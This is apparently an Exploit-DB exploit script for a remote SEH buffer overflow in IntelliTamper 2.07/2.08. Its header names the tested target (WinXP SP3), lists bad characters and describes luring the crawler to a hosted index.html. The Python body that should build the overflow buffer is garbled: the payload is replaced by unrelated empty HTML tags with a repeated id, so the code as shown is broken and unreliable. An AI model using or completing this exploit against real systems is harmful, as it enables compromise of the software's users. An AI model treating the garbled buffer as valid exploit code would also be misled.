# IntelliTamper 2.07/2.08 (SEH) Remote Buffer Overflow # Based on PoC: http://www.exploit-db.com/exploits/11217 # Author: loneferret # Big thanks to: dookie # Tested on WinXP SP3 English # Just copy the resulting html file on a web server, and point Intelli Tamper to that adress. # Should get a calculator # Thanks to dookie for telling me to stick to it. # Exploit-DB : Try Harder (tm) #!/usr/bin/python #badchar list: \x00\x3C\x01 buffer = 'loneferret test

    <pre id="vvttv"><mark id="vvttv"><progress id="vvttv"></progress></mark></pre>
    <pre id="vvttv"></pre>

      <p id="vvttv"></p>

          <p id="vvttv"></p>

                <p id="vvttv"></p>

                <pre id="vvttv"><cite id="vvttv"><progress id="vvttv"></progress></cite></pre>

                  <output id="vvttv"><dfn id="vvttv"><th id="vvttv"></th></dfn></output>

                    <p id="vvttv"></p>

                    ' buffer += ' ' file=open('index.html','w') file.write(buffer) file.close()